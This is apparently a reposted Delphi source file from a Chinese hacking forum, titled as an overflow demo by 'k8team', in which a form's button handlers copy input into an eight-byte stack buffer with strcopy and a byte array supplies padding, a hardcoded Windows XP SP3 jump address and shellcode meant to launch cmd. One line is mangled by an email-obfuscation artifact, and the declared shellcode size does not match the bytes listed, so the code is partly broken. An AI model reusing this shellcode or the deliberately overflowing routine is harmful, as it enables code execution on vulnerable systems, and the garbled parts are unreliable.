[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses
  Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,Dialogs,StdCtrls;



type
  TForm1 = class(TForm)
    Edit1: TEdit;
    Button1: TButton;
    Button3: TButton;
    procedure Button2Click(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure Button3Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
 const
     ShellCodeSize = $00000079;  //16进制 -  121
//delphi overflow demo  by k8team
ShellCode : Array[0..ShellCodeSize-1] of byte =
(
//AAAA BBBB CCCC
$41,$41,$42,$43,//115 73

$12,$45,$fa,$7f,// xp sp3 跳转地址

//CMD ShellCode 
$55,$8B,$EC,$33,$C0,$50,//105  69
$C6,$F4,$4D,$C6,$F5,$53,$F6,$56,$F7,$F8,$52,$F9,$54,$FA,$2E,$FB,$44,$FC,$4C,$FD,$8D,$BA,$7B,$1D,$80,$7C,$FF,$D2,$55,$83,$2C,$B8,$63,$6F,$6D,$89,$61,$6E,$64,$22,$88,$C7,$93,$BF,$77,$D0
);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
var k8test:pchar;
  procedure k8overflow(k8test:pchar);
  var test :array[0..7] of char;
  begin
    k8test:=pchar(edit1.text);
    strcopy(test,k8test);     //溢出
  end;
begin

  k8test:=pchar(edit1.text);
  k8overflow(k8test);
  
  application.MessageBox(‘没有溢出！‘,‘test‘);

end;

procedure TForm1.Button2Click(Sender: TObject);
begin
  application.MessageBox(‘溢出了！‘,‘test‘);
end;


procedure TForm1.Button3Click(Sender: TObject);
var k8test:pchar;
  procedure k8overflow(k8test:pchar);
  var test :array[0..7] of char;
  begin

     k8test:[email?protected];

     strcopy(test,k8test);  //溢出

  end;
begin

  k8test:=pchar(edit1.text);
  k8overflow(k8test);
  application.MessageBox(‘没有溢出！‘,‘test‘);

end;

end.